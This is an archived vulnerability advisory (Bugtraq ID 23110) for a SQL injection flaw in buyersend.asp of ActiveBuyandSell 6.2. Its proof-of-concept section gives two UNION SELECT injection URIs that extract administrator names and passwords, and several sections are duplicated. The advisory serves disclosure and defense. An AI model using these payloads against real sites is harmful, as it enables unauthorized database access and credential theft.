ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
BID:23110
Info
ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
| Bugtraq ID: | 23110 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2007 12:00AM |
| Updated: | Mar 23 2007 04:23PM |
| Credit: | CyberGhost is credited with the discovery of this vulnerability. |
| Vulnerable: |
Active Web Softwares ActiveBuyandSell 6.2 |
| Not Vulnerable: | |
Discussion
ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
ActiveBuyandSell is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects version 6.2; other versions may also be vulnerable.
ActiveBuyandSell is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects version 6.2; other versions may also be vulnerable.
Exploit / POC
ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
http://www.example.com/buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
Solution / Fix
ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
ActiveBuyAndSell BuyerSend.ASP SQL Injection Vulnerability
References:
References:
- ActiveBuyandSell Homepage (Active Web Softwares)